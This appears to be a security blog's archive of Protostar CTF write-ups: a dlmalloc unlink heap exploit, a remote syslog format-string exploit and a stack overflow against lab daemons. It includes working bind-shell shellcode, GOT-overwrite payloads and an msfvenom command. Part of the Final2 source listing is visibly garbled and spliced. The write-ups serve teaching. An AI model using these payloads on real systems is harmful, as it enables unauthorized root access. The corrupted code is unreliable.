Author Archives: learningcybersec

Protostar Final2

Level Text

#include "../common/common.c"
#include "../common/malloc.c"

#define NAME "final2"
#define UID 0
#define GID 0
#define PORT 2993

#define REQSZ 128

void check_path(char *buf)
{
  char *start;
  char *p;
  int l;

  /*
  * Work out old software bug
  */

  p = rindex(buf, '/');
  l = strlen(p);
  if(p) {
      start = strstr(buf, "ROOT");
      if(start) {
          while(*start != '/') start--;
          memmove(start, p, l);
          printf("moving from %p to %p (exploit: %s / %d)\n", p, start, start = 255) break;

      buf = calloc(REQSZ, 1);
      if(read(fd, buf, REQSZ) != REQSZ) break;

      if(strncmp(buf, "FSRD", 4) != 0) break;

      check_path(buf + 4);     

      dll++;
  }

  for(i = 0; i < dll; i++) {
                write(fd, "Process OK\n", strlen("Process OK\n"));
      free(destroylist[i]);
  }
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *username;

  /* Run the process as a daemon */
  background_process(NAME, UID, GID); 
  
  /* Wait for socket activity and return */
  fd = serve_forever(PORT);

  /* Set the client socket to STDIN, STDOUT, and STDERR */
  set_io(fd);

  get_requests(fd);

}

Intro

This is the last level in this series of exercises. In this exercise I will show how to do a remote exploit by attacking a program which uses a vulnerable Doug Lea malloc implementation. To pass this level I used mostly the same technique as in Heap3 level which exploits local Doug Lea malloc implementation. To not repeat myself, I suggest reading how Heap3 exploit works before doing this level.

Program flow: From main(), the program begins by daemonizing itself, accepting incoming connections, redirecting I/O to client socket and then calling the get_requests() function. Function get_requests() will accept up to 256 packets of length 128 bytes and for each packet, it will allocate and zero-out a chunk on the heap. If the packet begins with the keyword “FSRD“, the string which the packet consists of will be passed as an argument to the check_path() function. The check_path() will first try to find the “/” character index inside the provided string and the length from that position to the end of the packet. Note that character “/” needs to be found in order to continue the execution of this function. Next, the function will try to find the substring “ROOT” inside the provided string. This substring needs to be found in order to continue execution of the program. After finding the location of “ROOT”, it finds the location of the first “/” character which precedes the “ROOT” string. Note that this part is important because this is where the vulnerability lays. After that, memmove() will copy bytes starting from position p and copy them to location pointed by start. The following printf() is omitted from the binary provided in the virtual machine so I will ignore it. After returning from check_path(), the get_requests() function will free all the space allocated by calloc and exit.

Vulnerability: The vulnerable part of this program is at line 26. If we look carefully, we can see that the program won’t check if “ROOT” comes before or after the “/” sign, so by providing the “/” character after the “ROOT” substring, code at line 26 will try to find the “/” character preceding “ROOT” substring and it won’t find it in current heap chunk, but it will “overflow” the search to the chunk preceding it, which, if it’s found, will allow us to overwrite data from the previous chunk using memmove(). This allows us to cause heap overflows and overwrite heap chunk headers of neighboring allocated chunks and thus allowing us to manipulate memory when free() gets called on that compromised chunk.

Approach: From this point on I will assume that you are familiar with basics of how the heap works, what is the difference between free and allocated chunks, what merging forwards and backwards is and how unlink() works. You can learn about all of this from my previous Heap3 blog post. The main idea for solving this level is to trick the memmove() call to overwrite previous chunk with enough data so it overflows into the current chunk and change it’s header data so when the current chunk gets free()‘d, it will enable us to do an arbitrary write, thus allowing us to overwrite a GOT entry of some function and point it to the shellcode we made which will in turn spawn a shell listening on port 4444 at server side.

Solution

Considering everything said before, I suggest the following steps:

  1. Make shellcode.
  2. Find address of GOT entry we want to overwrite.
  3. Find address of shellcode.
  4. Craft exploit.
  5. Execute exploit.

Step1: Because the shellcode from the previous level would suffice, I used that one. Shellcode will spawn a shell and bind it to TCP port 4444 so we can connect to it and get root access. It is also prepended with 24 bytes of NOP sled. Shellcode looks like this:

shellcode = “\x90” * 24

shellcode += “\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80” \             “\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a” \             “\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0” \             “\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f” \             “\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0” \             “\x0b\xcd\x80\x00”

Step2: Because the exploit will only work after free() gets called, we need to find some function which will get called after that and overwrite its GOT entry with the address of our shellcode. The after disassembly of function get_requests(), we can see that a suitable function would be the function write() whose GOT entry is at 0x0804d41c. This is shown in the image below:

Screenshot from 2018-02-23 22-20-40.png

Image 1: Write() function’s GOT entry is located at 0x0804d41c

Step 3: To find the address of our shellcode, we first need to put it somewhere. The only thing that came to my mind was to put it inside a 128 byte packet which will get stored on the heap. So it’s simple, using GDB we can set a breakpoint after calloc() and read() and see where exactly our shellcode will be located.

Screenshot from 2018-02-23 22-34-12.png

Image 2: location of the first allocated chunk at 0x0804e008

Screenshot from 2018-02-23 22-36-22.png

Image 3: location of shellcode inside the first allocated chunk

From Image 3 we can see the locations of the beginning of shellcode by looking at the location of the NOP sled (where “\x90” bytes begin). To be sure to jump to the shellcode, I used an address inside the NOP sled. The address I chose was 0x0804e01c.

Step 4: Crafting the exploit. First let’s see how the heap looks after 2 packets had arrived:

Screenshot from 2018-02-23 22-45-33.png

Image 4: Heap state after 2 packets arrived

So when the second packet arrives, it is located immediately after the first one on the heap. I know that we couldn’t be sure that this will always happen, but this malloc implementation seems to do put them this way every time. We can see that the first packet data, if overflowed, could overwrite second packet’s header data, that is prev_size and size bytes. Also note that each packets data is exactly 128 bytes in size. What will be the content of first packet? First packet’s data will look like this:

“FSRD” + “/” + “A” * 8 + shellcode + “A….A” + “ROOT” + “/”

If you read the intro part, we know that after check_path() gets executed, it will just copy the string starting from the first “/” and put it at the same location, effectively doing nothing useful and changing nothing. There is a 8 byte padding before shellcode for the same reason I used it in Heap3, because when free() gets called, it writes some bytes at that location which could overwrite part of our exploit, making it unable to execute or corrupt it. Bytes “A…A” after shellcode mean that they spread until the last “ROOT/” bytes at the end of the packet. The second packet’s data will look like this:

“FSRD” + “ROOT” + “/” + 0xfffffff8 + 0xfffffffc + (GOT_ADDR-12) + SHELLCODE_ADDR + “C…C”

Very similar to the previous one. If you read Heap3, you know that the bytes 0xfffffff8 (which is -8) and 0xfffffffc (which is -4) are used when overwriting a heap chunk header’s data. (GOT_ADDR-12) denotes the offset from the address that will get overwritten with SHELLCODE_ADDR, again, if this is not clear to you, read about it in Heap3. At the end there is just a padding of “C” bytes to fill up the packet until 128 bytes are reached.

When check_path() gets called upon the second packet, the p pointer will point to the “/” character after “ROOT”, and start pointer, will point to the last “/” character in the previous packet (packet number one) because there is no “/” character in this packet that precedes the “ROOT” substring, thus “overflowing” the search to the previous packet. After that, the memmove() function will write everything after the “/” character from the second packet to the “/” character found at the end of the first packet, thus overflowing the first packet and overwriting the second packet’s headers and data field in a controllable manner. The heap will then look like this:

Screenshot from 2018-02-23 23-21-40.png

Image 5: Heap state after check_path() gets executed on second chunk

We created an artificial chunk inside the second chunk’s data segment which will allow us to do an arbitrary write operation when unlink() gets executed. When unlink() gets executed, it will write our shellcode address SHELLCODE_ADDR to the (GOT_ADDR-12)+12 = GOT_ADDR GOT entry address.

After this is done, the next call to write() will trigger our shellcode to get executed, spawning a remote shell. Notice one more thing: we need another, dummy chunk (third one) for write() to get called, because the write() function is executed before each free() call so another chunk is needed.

 

Step 5: Executing the exploit. I wrote a simple attacking script for this level which can be found at my GitHub page here. After executing it and connecting to the remote machine port 4444, we can see that the shell was successfully spawned and we now have root access:

proof_of_work.png

As always, thanks for reading!

Protostar Final1

Level Text and Code

Intro

This level requires us to exploit a remote format string vulnerability similar to ones we exploited in previous Format levels. The only difference is that in this level we have some network programming involved, but nothing too serious.

 

1. Program flow: Starting from the Main function, the program first daemonizes the process and sets a socket to listen on port 2994, after which, it just redirects all I/O to the incoming connected socket. Next two functions which get called are getipport() and parser(). The former function is used to store information about incoming connection in global variable hostname formatted as “IP_ADDRESS:PORT”. The later function, parser(), is used to parse user commands from connected client socket. Supported commands are “login” and “username“. Username command will copy content after the given command into the username global variable. The login command will, if the username was set, call the function logit() or throw an error if it wasn’t set, also, it expects a user given argument interpreted as a password. This brings us to the interesting part, the function logit(). Function loads a buffer of 512 bytes with a formatted string and feeds it as an argument to syslog(). Interesting part here is that syslog() belongs to printf() family of functions in respect to parameters it expects which, by syslog man pages are priority as the first argument, format string as the second and later comes everything which is used to fill the format parameters in the format string (i.e. %d). This exposes the vulnerability we need to exploit.

2. The vulnerability: Vulnerability comes from providing only 2 arguments to the syslog() function, thus giving us ability to make our own format string in the 512 byte buffer mentioned before. The string we make in that buffer will be used as a format string in the syslog() call, thus enabling us arbitrary stack reads and memory writes. For more information, you can use some of my earlier posts from the Format levels [1] or a good guide for string format exploits [2].

3. Approach: My approach was to first find out where on the stack is our format string (buffer content) located. After that, we can tailor its content to enable us writing arbitrary data at arbitrary addresses in memory (which are writable) and use that ability to overwrite GOT entry for a function we find suitable. By overwriting the GOT entry of a function, whenever that function gets called, the execution will be redirected to the address we overwrite it with instead of that function’s code. If you are not so familiar with GOT, try taking a quick look at [3] or [4]. One thing that may cross your mind is that why wouldn’t we use the insecure strcpy call from line 41 to simply overflow username global variable and overwrite the return address. The reason I think that wouldn’t be possible (by my logic, I may be wrong) is because the username variable is stored in the BSS data segment (where uninitialized variables get stored) and not on the stack, jut look at this image.

Solution

Considering everything said in the Intro section, solution steps would look something like this:

  1. Find the address of an interesting function’s GOT entry.
  2. Construct skeleton for the format string exploit.
  3. Make payload shellcode which get’s executed on the server.
  4. Find location of shellcode on the stack.
  5. Tailor format string exploit.
  6. Execute exploit.

Step 1: By using GDB to analyze disassembly of our program, I choose the function puts() as the target function to overwrite its GOT entry. Before finding the location of GOT entry, we need to find the location of the PLT stub for that function. We can first attach GDB to the final1 running daemon process by issuing bash command: “pidof final1” which will give us the PID of the process and then open GDB and issue command: “attach PID” where PID is the one we got from the pidof command. I choose to disassemble the parser() function and find the address of PLT entry of puts() function because it will be called either at line 44 or line 47 from our code. puts() is just an optimization when printf() gets called with only one argument.

Screenshot from 2018-02-19 15-47-21.png

Image 1: Location of puts PLT stub at address 0x8048d4c

As we can see, the PLT entry is at 0x804989a. Because this is a stub of code, that means we can disassemble it. Disassembling it shows us the instructions:

Screenshot from 2018-02-19 15-53-00.png

Image 2: Disassembly of puts() PLT entry

From the image above we can see that the first instruction is a jump instruction to the address pointed by the address found at 0x804a194, which is the GOT entry for puts()It is important to know that the jump wont jump to the address 0x804a194 itself, but the address stored at address 0x804a194, therefore 0x804a194 is a pointer to a location where the program flow will get redirected to when puts() gets called. Our goal is to overwrite whichever address is stored at memory location 0x804a194 with an address of our shellcode we will make later and store on the stack.

Step 2: Now we need to construct the skeleton for our exploit. To do that we need to remember how format string exploitation works. printf() family functions have an internal pointer which points to the arguments on the stack that will be used when replacing the format parameters prepended with the “%” sign in the format string argument. If we can manipulate that pointer, we can point it to arbitrary locations on the stack, and if we can manipulate with the format string argument, we can manipulate with that pointer. We can use direct parameter access using $ symbol to point the internal stack pointer wherever we wish on the stack. That is, if we write something like “%10$8x” as a format string, that would be interpreted as: “move internal pointer by 10 places and print value found at that location as an 8 byte hexadecimal number”. If for example we provide something like “%20$n”, that would get interpreted as: “move internal pointer by 20 places and write the number of currently written bytes at the address represented as 4 bytes found at that place”. This is very short explanation and I encourage you to read more about it from Format levels starting at [1] or a paper explaining it in detail at [2].

The main idea behind the exploit is to use found format string vulnerability to overwrite the GOT entry of puts() function located at 0x804a194. From code analysis before, we know that user can provide 2 inputs: username or password. Because the username buffer is bigger than password buffer, I decided to use the username buffer as a shellcode storage (which we will get to a bit later) and use the password argument to login command as a way to tailor the format string. Consider the following format string exploit code skeleton:

login = padding + “\x94\xa1\x04\x08” + “\x95\xa1\x04\x08” + “\x96\xa1\x04\x08” + “\x97\xa1\x04\x08” + “%aax%$bbn” + “%ccx%$ddn” + “%eex%$ffn” + “%ggx%$hhn”

padding is a number of irrelevant bytes which we can ignore for now. Imagine that bb, dd, ff and hh are the offsets of syslog()‘s internal pointer to get to the locations of: “\x94\xa1\x04\x08”, “\x95\xa1\x04\x08”, “\x96\xa1\x04\x08”, “\x97\xa1\x04\x08” respectively inside the same format string which is located on the stack. Imagine that aa, cc, ee and gg are bytes which, when written to their respective addresses mentioned above, together make the address of shellcode location on the stack. To be more precise, remember that the %n parameter writes the number of bytes written in the format string until now, so by expanding the format string by aa, cc, ee and gg bytes accordingly (by using the x specifier), we can choose which values will be stored at locations pointed to by bb, dd, ff and hh. This is the meat of our exploit. Now the only hard part is to determine the values for bb, dd, ff, hh and aa, cc, ee and gg. Here is a picture to illustrate it better:

download.png

Image 3: Stack state after syslog() gets called

Image 3 shows how the stack looks when syslog() gets called. Purple cells represent the 512 bytes buffer and the green cells represent arguments which get passed to functions. The role of bb, dd, ff and hh is to point the syslog() internal pointer to addresses of each byte of puts() GOT entry location (4 bytes starting from 0x804a194), that is, they dictate where will something get written to. aa, cc, ee and gg dictate what will get written to that location.

How to determine bb, dd, ff and hh? Well to determine those values I used a bruteforce method. Good thing to know is that, when the syslog() function gets executed, it writes into /var/log/syslog file a new line. So I made a simple script called stackfind.py which will help us find those offsets. You know that the offset values are right when the 4 values after the first dot are 424242424343434344444444 and 45454545, which are hex representations of BBBB, CCCC, DDDD and EEEE. Here is what script parameters worked for me:

Screenshot from 2018-02-19 22-17-33.png

Image 4: Executing stackfind.py using parameters 46, 10 and 3

Image 4 shows the content of the format string which will be sent to the server, which will in turn write to syslog 10 locations of size 4 bytes starting from internal pointer position 46 and padded with 3 “A” bytes for alignment purposes. The output in /var/log/syslog will look like this:

Screenshot from 2018-02-19 22-17-48.png

Image 5: /var/log/syslog content after executing stackfind.py

We can see from the image above that the first 4 bytes after the first dot are well aligned and start with 42424242 (and so on) which is the indicator that we found the correct offsets represented as placeholders bb, dd, ff and hh which are: 46, 47, 48 and 49 respectively.

Step 3: I had few problems with the shellcode generated using msfvenom (described in the previous level) because the shellcode it generated contained null bytes (\x00). Considering we are doing a format string exploit, null bytes are not welcome because as we know from programming 101 (probably a undergraduate class using C language), null bytes are used for string terination, which means that our shellcode will not be copied entirely by the strcpy call at line 41 but just until the first null byte. To aid this, I googled a bit and found a shellcode without null bytes which function is to spawn a shell and bind it to TCP port 4444, also, I prepended that shellcode with a NOP sled of 24 bytes just to be sure I land on it:

shellcode = “\x90” * 24
shellcode += “\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80” \                               “\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a” \                               “\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0” \                             “\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f” \                               “\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0” \
                         “\x0b\xcd\x80”

Also, note that I used this shellcode in the stackfind.py script because I needed the correct size of the shellcode because it affects the offset of stack parameters and alignment.

Step 4: Finding where the shellcode will get stored on the stack. To do this I used GDB and set a few breakpoints, this was easy. First I opened GDB, attached to the process final1, and then set GDB to follow the child process when a process gets fork()‘ed, this enables us to continue debugging when the client socket gets connected to the server because that is the time a child process will get created to serve the client socket. This can be done with GDB command: “set follow-fork-mode child”. The only breakpoint we really need is the one after syslog() function returns and the stack gets changed because of the expanding done in the format string. After looking at the stack we can find the starting of the NOP sled:

Screenshot from 2018-02-20 00-21-50.png

Image 6: NOP sled on the stack starting at 0xbffff9d2

So to be sure, we can use an address which is in the NOP sled, 0xbfff9d3 for example.

Step 5: Tailoring format string exploit is done by replacing the aforementioned placeholders. We managed to find the values for bb, dd, ff and hh which are: 46, 47, 48 and 49. And now we need to find the values for aa, cc, ee and gg. Ok, so the goal is to write the address 0xbffff9d3, and to do that we need to write \xd3 to the location 0x804a194\xf9 to 0x804a195\xff to 0x804a196 and \xbf to 0x804a197. Let’s look at our exploit string after it gets expanded with shellcode and before it gets expanded with what we provide in password:

Login from 192.168.56.1:47160 as [������������������������1���SCSj#002���f̀[^Rh�#002#021\j#020QP��jfX̀�A#004�#004�f̀C�f̀�Yj?X̀Iy�h//shh/bin��PS���#013̀] with password [

Because %n format specifier writes number of bytes written until now in the format string, we need to calculate by how much more bytes we need to expand the string to get to the first byte we wan’t to write, that is the byte \xd3. The above expanded string is of approximate size 150 bytes, that is 0x9B. Because we need to write a value that is smaller than that, we need to write at least 0x100 more bytes to get to that value. So the calculation would be: 0x100 (for expansion) + 0xd3 (which we need) – 0x9B (which we have) = 0x138 = 312 bytes. This means that, when we expand the format string by 312 bytes by entering the format “%312x%46n”, the value \x0138 will be written starting at the location 0x804a194. The real value for the placeholder aa will be 312. We then add this number to the counter bytes written so far which is 0x9B + 0x138 = 0x1D3 = 467. Next we need to write the value \xf9 and because this value is bigger than \xd3 which we have already written (along with another \x01 which we don’t need and will overwrite with this next write) we need to expand the format string by another 0x1f9 – 0x1d3 = 0x26 = 38 bytes, and thus the real value for the placeholder cc will be 38. Number of total values written so far is 0x1f9. Next value is \xff, this value is greater than the one written before so we will write 0x1ff – 0x1f9 = 0x06 more bytes, thus the value for ee will be 6. The last value we need to write is \xbf and because this value is smaller than \xff, we need to write another 0x100 bytes. Total number of bytes to write is 0x2bf – 0x1ff = 0xc0 = 192 bytes, thus giving us real value for gg placeholder which is 192. Our complete exploit before the expansion of password format part will look like this:

Login from 192.168.56.1:47160 as [������������������������1���SCSj#002���f̀[^Rh�#002#021\j#020QP��jfX̀�A#004�#004�f̀C�f̀�Yj?X̀Iy�h//shh/bin��PS���#013̀] with password [%312x%46$n%38x%47$n%6x%48$n%192x%49$n]

To not do this by hand, I made a script named cli.py which does this for us. Take note that this script may not work for everyone because in the introduction of this exercise there is a statement that there may be some variations of written bytes in memory and therefore some changes could be needed according to your situation, for example the shellcode stack address will probably not be the same.

Step 6: Proof of work and execution of the exploit. Without further ado, here is the proof of work for this exploit:

Screenshot from 2018-02-20 01-20-13.png

Image 7: Proof of work

Thank you for reading!

References

[1] Format0, https://secinject.wordpress.com/2017/07/11/protostar-format0/

[2] scut / team teso, Exploiting Format String Vulnerabilities, https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf

[3] https://secinject.wordpress.com/2018/01/04/protostar-heap1/

[4] Bendersky E., Position Independent code (PIC) in shared libraries, https://eli.thegreenplace.net/2011/11/03/position-independent-code-pic-in-shared-libraries/

Protostar Final0

Level Text

#include "../common/common.c"

#define NAME "final0"
#define UID 0
#define GID 0
#define PORT 2995

/*
 * Read the username in from the network
 */

char *get_username()
{
  char buffer[512];
  char *q;
  int i;

  memset(buffer, 0, sizeof(buffer));
  gets(buffer);

  /* Strip off trailing new line characters */
  q = strchr(buffer, '\n');
  if(q) *q = 0;
  q = strchr(buffer, '\r');
  if(q) *q = 0;

  /* Convert to lower case */
  for(i = 0; i < strlen(buffer); i++) {
      buffer[i] = toupper(buffer[i]);
  }

  /* Duplicate the string and return it */
  return strdup(buffer);
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *username;

  /* Run the process as a daemon */
  background_process(NAME, UID, GID); 
  
  /* Wait for socket activity and return */
  fd = serve_forever(PORT);

  /* Set the client socket to STDIN, STDOUT, and STDERR */
  set_io(fd);

  username = get_username();
  
  printf("No such user %s\n", username);
}

Intro

This level combines stack overflow and network programming for a remote exploit. The goal in this exercise is to get root privileges.

A short overview of the program: Starting in main, the process gets daemonized and waits for incoming connections from port 2995. Input, output and standard error descriptors are all redirected to the client socket. get_username() function gets called and the return value is printed to stdout which is redirected to the connected client socket. So far so good. In function get_username(), we can see that a buffer of 512 bytes gets cleared and filled using gets() function. From previous tasks we know that this is a insecure function in the way that it does not check if the user given input can be accommodated inside the buffer given as the argument. Later, after some character stripping, the buffer content gets converted to uppercase, copied and a pointer to it gets returned.

The first approach that came to my mind was making a tcp binding shellcode, putting it into buffer and overflowing the return address to point to the beginning of that shellcode. The main problem I needed to deal with was the toupper processing of the buffer. That is a problem because some shellcode operation code bytes fall in the range that would get transformed to uppercase characters (range 0x61 – 0x7a) and make a different instruction when executed. I will explain in more detail how I dealt with this in the Solution section.

Solution

Considering the approach described in the previous section, solution steps would look something like this:

  1. Find location of return address.
  2. Find the location where the shellcode will be placed.
  3. Make shellcode.
  4. Construct and execute exploit.

Step1: We need to somehow find the location of return address we wish to overflow and make it point to our shellcode. Actually, we need to find the offset from the start of the buffer to the location of the return address. Instead of just using GDB to find all the addresses, I decided to take a different approach this time, for learning purposes. I wrote a simple program that looks like this:

Screenshot from 2018-02-12 15-35-35.png

Image 1: Finding offset from buffer to return address

I don’t know if this is the optimal solution but it works. In an infinite loop, we are creating connections with the “final0” daemon process which runs on a virtual machine located at 192.168.56.101:2995. Each connection will send 512 bytes to fill the buffer and additional i filler bytes (i increments every iteration) to try and hit the return address. This works because every time we send valid input, the daemon will respond with a message: “No such username” (or something similar), but when we hit the return address, the program on the virtual machine server will crash and generate a core dump instead of giving us that message. So the goal is to simply add more bytes in every iteration until no meaningful reply is received from the server which indicates that the program crashed.

NOTE: I posted an image instead of a code snippet because most of the time WordPress wrongly formats the snippet and turns it into gibberish.

After running the code, we get that the offset from the start of the buffer to the return address is 512 + 20 = 532 bytes. To verify this, we can look at the core dump using GDB command “gdb ./final0 /tmp/core_file” and then looking at the saved eip from the stack frame:

Screenshot from 2018-02-12 16-17-51.png

Image 2: Verification that we hit the return address

 

Step 2: Finding the location to place our shellcode. Well, because we have a pretty strong limitation given by toupper processing, I considered placing the shellcode immediately after the return address, that is, somewhere outside the buffer which will be toupper processed. Here is a diagram to show what I mean:

download.jpeg

Image 3: Stack representation of running program when execution gets redirected

 

So our exploit payload would look something like this:

512_bytes_to_fill_buffer + 20_filler_bytes_to_reach_return + 4_bytes_address_to_NOP_sled + shellcode_bytes

Step 3: Next, we need to craft an exploit. This is supposed to be the harder part if we wan’t to do it by hand, but I’ll just skip doing it by hand this time and use a tool named msfvenom that comes preinstalled with Kali Linux. This tool provides functionality for crafting and encoding shellcodes for a variety of platforms. Although I think that writing shellcode by hand is better for learning and understanding purposes, I think that learning to use such tool is of great use when participating in CTF-s or when time is of the essence.

What kind of shellcode are we looking to make? Well, we have a remote virtual machine to exploit and get root access to so we will need some network programming involved. The usual stuff I found on the internet were TCP binding shellcodes so I used one of those. The idea is to create a remote listening process that listens on some port and waits for us to connect to it. When we connect to that port, the remote process will redirect stdin, stdout and stderr to the connected client socket (us) and using an execve call, spawn a shell which we will be able to send commands to. I will now show you how to do that using msfvenom.

Msfvenom provides a great deal of functionality but we will need only a small fraction of it for solving this exercise. Using the command: “msfvenom -l payloads | grep linux/x86 | grep tcp” we can list all interesting payloads and find the one that suits us. The one I used was: “linux/x86/shell_bind_tcp“. The best part about this tool and shellcodes it provides is that the shellcode is modular and you can specify the port you want for the process to listen on. So by looking at manpages and examples, we can construct the following command:

Screenshot from 2018-02-12 17-16-03.png

Image 4: Using msfvenom to generate shellcode

 

With -p option we choose a payload, and each payload can have additional arguments such as LPORT which is used to set which port will be used to listen on, -a option is used to specify the architecture (32 bit in this case because our victim system is an x86 system), then we choose Linux as our target platform and with -f we choose the format in which the shellcode will get outputted as (in our case Python is used because a Python script will be used to send the payload to the VM). If we omitted the -f option we would just get the raw instruction bytes. Now we can just copy and paste this python code into our python attack script.

Step 4: Constructing and executing the exploit. The only thing that is left for us to find out is the address of the NOP sled we will jump to when redirecting program execution. To find that out, we can construct our exploit to look like this:

“a” * offset + “bbbb” + nopsled * 20 + shellcode

and then simply look through the generated core dump and find out where the NOP bytes are (“\x90”):

Screenshot from 2018-02-12 17-31-51.png

Image 5: NOP sled location

Now when we found location of our NOP sled, we can simply use any address from that NOP sled to overwrite the return address with. Let’s choose 0xbffffc74 for example. The full exploit code now looks like this:

“a” * offset + “\x74\xfc\xff\xbf” + nopsled * 20 + shellcode

After executing the attack script, we can verify on the server side that there really is a process listening on TCP port 4444 using the command: “netstat -lt“:

Screenshot from 2018-02-12 17-36-51.png

Image 6: Created process listening on port 4444

And when we connect to the remote VM on TCP port 4444 using netcat we can get the shell and root access:

Screenshot from 2018-02-12 17-38-41.png

Image 7: Proof of work

NOTE: I uploaded the full python attack script on my github page here.

That’s all, thanks for reading! 😀

 

Protostar Heap3

Level Text

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

void winner()
{
  printf("that wasn't too bad now, was it? @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  char *a, *b, *c;

  a = malloc(32);
  b = malloc(32);
  c = malloc(32);

  strcpy(a, argv[1]);
  strcpy(b, argv[2]);
  strcpy(c, argv[3]);

  free(c);
  free(b);
  free(a);

  printf("dynamite failed?\n");
}

Intro

This level introduces the Doug Lea Malloc (dlmalloc) and how heap meta data can be modified to change program execution. The goal for this level is to call the winner function.

First, let’s look at the difference in structure of free and allocated memory chunks (ones we allocate with malloc):

Screenshot from 2018-01-18 13-27-40.png

Image 1: Representation of chunks in memory [1]

 As a short reminder: dlmalloc keeps free chunks (chunks available for allocation) in a doubly linked list of chunks (right side of Image 1). Each free chunk has fields representing:

  • Prev_size: If previous chunk is allocated, the size field represents data from that chunk.
  • Size: Size of free chunk.
  • FD pointer: Pointer to next free chunk in doubly linked list.
  • BK pointer: Pointer to previous free chunk in doubly linked list.
  • Unused space: Space where user data would be stored if allocated.
  • Size: Size of chunk, this field is used for easier merging of chunks.

In contrast, the structure of allocated chunks is:

  • Previous size: If previous chunk is allocated this field represents last 4 bytes of that chunk. If previous chunk is free, this field represents the size of that chunk.
  • Size: Size of this chunk including chunk metadata (header). Last bit of this chunk (called P or “prev_inuse” bit) indicates if the previous chunk is in use or not.
  • User data: Space available for user data.

Important thing to note here are the relations between those two chunk types: Imagine you have a user allocated chunk of memory which looks as the left side of Image 1. If we convert this chunk into a free chunk type (right side of Image 1), the first 8 bytes of “User data” will be represented as FD and BK pointers of the free chunk. We will need this later because it is crucial for our exploit.

Let’s see how our level looks like in memory:

Screenshot from 2018-01-18 14-25-42.png

Image 2: Level representation in memory

As we can see, the three pointers (a, b and c) are located on the stack and point to their corresponding allocated memory chunks which are located on the heap.

The attack vector we use in this level is the vulnerable strcpy call which doesn’t check how many bytes get written into the buffer and thus allowing us to cause overflows.

Short reminder on how free works: It is important for memory allocator to avoid fragmentation, that is most of your memory is allocated in a large number of non-contiguous blocks. To avoid this, the allocator needs to coalesce/merge contiguous free chunks. I found a very good and short explanation of how free works on Sploitfun blog [2] and source code for dlmalloc at [3]. So merging forward (if next chunk is also free) or backward (if previous chunk is free) works as follows:

Merging backwards:

  1. Check if previous chunk is free: “Previous chunk is free, if current freed chunk’s PREV_INUSE (P) bit is unset.” [2]
  2. Merge if free: “unlink (remove) the previous chunk from its binlist, add previous chunk size to current size and change the chunk pointer to point to previous chunk.” [2]

Merging forward:

  1. Check if previous chunk is free: “Next chunk is free, if next-to-next chunk’s (from currently freed chunk) PREV_INUSE (P) bit is unset. To navigate to next-to-next chunk, add currently freed chunk’s size to its chunk pointer, then add next chunk’s size to next chunk pointer.” [2]
  2. Merge if free: “unlink (remove) the next chunk from its binlist and add next chunk size to current size.” [2]

We mentioned a “unlink” gets executed. Unlink is used to remove a chunk from doubly linked list of free chunks. This unlink call is very important and looks something like this:

Screenshot from 2018-01-18 14-58-58.png

Image 3: Unlink macro

is the chunk to unlink, BK and FD are variables used for redirection. Look at the right side of Image 1.

  • FD = P -> fd: pointer to the next free chunk is stored in FD
  • BK = P -> bk: pointer to the previous free chunk is stored in BK
  • FD -> bk = BK: we need to change the BK pointer of the free chunk following the chunk we are unlinking to point to the chunk before the one we are currently unlinking.
  • BK -> fd = FD: we need to change the FD pointer of the previous free chunk to point to the chunk following the chunk we want to unlink.

After this steps, the chunk pointed to by P will be unlinked from the doubly linked list of free chunks.

Now we can think about the idea of how to pass this level: Using unconstrained strcpy writes we could overflow data from one chunk to overwrite another chunk’s memory, thus allowing us to change its metadata (the allocated chunk’s prev_size and size fields from left part of Image 1). Arbitrary write to the size field allows us to change its prev_inuse bit, effectively changing the status of the previous chunk from allocated to free. By changing a neighboring chunk’s status to free, the free() function that gets called on the other neighboring chunk will trigger the unlink merging routine on the chunk we falsely set to be free. By manipulating the fields in the falsely set free chunk (which is actually allocated), the FD -> bk = BK line from unlink routine will give us an arbitrary memory write because we will control the addresses in FD and BK pointers. The details about this attack will be shown in the next chapter.

Solution

Solution steps:

  1. Find the address of winner.
  2. Find the redirection location, that is, a way which will redirect the program execution to the winner function.
  3. Put the address of winner at the redirection location.
  4. Test the exploit.

Note that I didn’t pass this level on my first try. My failed attempts are also documented and the errors I made are pointed out and explained.

Step 1: First, load our program in GDB using command: “gdb heap3”, next, set the disassembly output to Intel syntax using command: “set disassembly-flavor intel”. After this is done, we can begin. Get the winner function using command: “print winner” which will give you the address of the winner function. I explained in more detail (with pictures) how to do this in previous levels so I won’t do it again there to not repeat myself. The address of winner is: winner@08048864

Step 2: From discussions from previous levels, I picked the GOT way of redirecting program execution because it is the most reliable one. If we disassemble main function using “disass main”, by looking at line  we can see that the call to printf from 28th line in the given C source gets replaced with puts as an optimization. The puts call is located in a library so it needs to be resolved using Global Offset Table and Procedure Linkage Table, as explained in the previous levels. So we need to find the landing location from the PLT jump. Because PLT is just a bunch of code, we can disassemble it using comand: “disass 0x8048790” which gives us the below output:

Screenshot from 2018-01-18 15-59-09.png

Image 4: disassembling PLT

Output from Image 4 shows that the PLT trampoline jumps to the GOT entry located at redir_loc@0x0804b128 in the data section.

Step 3: Ok, now to the nasty part. We want to somehow write the address of winner from Step 1 to the redir_loc redirection location from Step 2. The way to do this is by modifying allocated chunk headers and forcing the unlink method to be called on a chunk we trick the program to think it’s free.

